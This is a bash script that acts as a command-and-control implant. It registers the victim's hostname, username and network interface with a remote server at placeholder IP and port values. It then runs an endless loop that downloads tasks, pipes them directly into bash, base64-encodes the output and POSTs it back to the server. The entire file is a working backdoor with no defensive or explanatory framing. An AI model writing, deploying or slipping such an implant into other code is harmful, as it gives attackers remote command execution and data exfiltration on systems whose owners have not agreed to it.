#!/bin/bash
ip="REPLACE_IP"
port="REPLACE_PORT"
interface="REPLACE_INTERFACE"
n=.3

regl="http://$ip:$port/reg/"

declare -A data=( [eth]=$interface [hname]=$(hostname) )

name=$(curl -X POST -F eth=$interface -F hname=$(hostname) -F username=$(whoami) $regl) 

taskl="http://$ip:$port/tasks/$name/"
resultl="http://$ip:$port/Lin-results/$name/"

while :
do  
    curl $taskl > /tmp/tasks 
    cat /tmp/tasks | bash > /tmp/results
    base64 /tmp/results > /tmp/enc-result   
    curl -X POST --data "@/tmp/enc-result" $resultl
    sleep $n    
done

